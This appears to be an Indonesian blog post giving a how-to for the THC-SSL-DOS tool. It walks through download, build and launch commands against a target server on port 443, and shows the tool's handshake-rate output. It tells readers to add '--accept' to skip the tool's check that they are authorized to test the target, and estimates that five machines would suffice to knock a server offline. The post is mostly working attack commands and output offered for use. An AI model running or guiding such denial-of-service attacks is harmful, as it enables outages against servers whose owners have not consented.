Search

SSL DOS


1. Cara menggunakan :
download dulu filnya di
http://www.4shared.com/get/GSCIoHne/thc-ssl-dos-14tar.html

ekstrak dulu filenya dengan

tar xvf thc-ssl-dos-1.4.tar.gz


lalu masuk ke folder /thc-ssl-dos-1.4.tar.gz

lakukan 

./configure

klo ada error


Quote:configure: error: libcrypto not found part of openssl.


berarti harus install libssl-dev

apt-get install libssl-dev

trus

make all install

jalaninnya:

./thc-ssl-dos masuk.in.ip.target 443

klo ada error:


Quote:ERROR:
Please agree by using '--accept' option that the IP is a legitimate target
and that you are fully authorized to perform the test against this target.

ini semacam agreement antara kita dengan pembuat aplikasi, tambahin --accept aja di line diatas

./thc-ssl-dos masuk.in.ip.target 443 --accept

jika sudah jalan akan muncul seperti dibawah:


Quote:root@iKONs:~/Programs/thc-ssl-dos-1.4/src# thc-ssl-dos masuk.in.ip.target 443 --accept
______________ ___ _________
\__ ___/ | \ \_ ___ \
| | / ~ \/ \ \/
| | \ Y /\ \____
|____| \___|_ / \______ /
\/ \/

http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground


Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 45 [45.39 h/s], 14 Conn, 0 Err
Handshakes 111 [66.31 h/s], 14 Conn, 0 Err
Handshakes 177 [66.50 h/s], 14 Conn, 0 Err
Handshakes 246 [68.77 h/s], 16 Conn, 0 Err
Handshakes 310 [64.02 h/s], 17 Conn, 0 Err
Handshakes 380 [70.01 h/s], 17 Conn, 0 Err
Handshakes 447 [67.14 h/s], 17 Conn, 0 Err
Handshakes 499 [51.92 h/s], 18 Conn, 0 Err
Handshakes 565 [66.16 h/s], 18 Conn, 0 Err
Handshakes 631 [65.66 h/s], 18 Conn, 0 Err
Handshakes 694 [62.98 h/s], 19 Conn, 0 Err
Handshakes 761 [67.30 h/s], 19 Conn, 0 Err
Handshakes 823 [61.69 h/s], 19 Conn, 0 Err
Handshakes 886 [62.96 h/s], 20 Conn, 0 Err

perhatikan yg warna merah diatas, berarti yg ane lakukan sekitar 60-70 koneksi per detik terhadap server, normalnya sebuah server dapat melakukan sampai 300 koneksi SSL
sehingga dapat disimpulkan serangan DoS yang ane lakukan tidak berhasil membuat server down 

berarti paling ngga ada 5 komputer dengan tools ini utk menjatuhkan suatu server...cmiiw

0 komentar:

Posting Komentar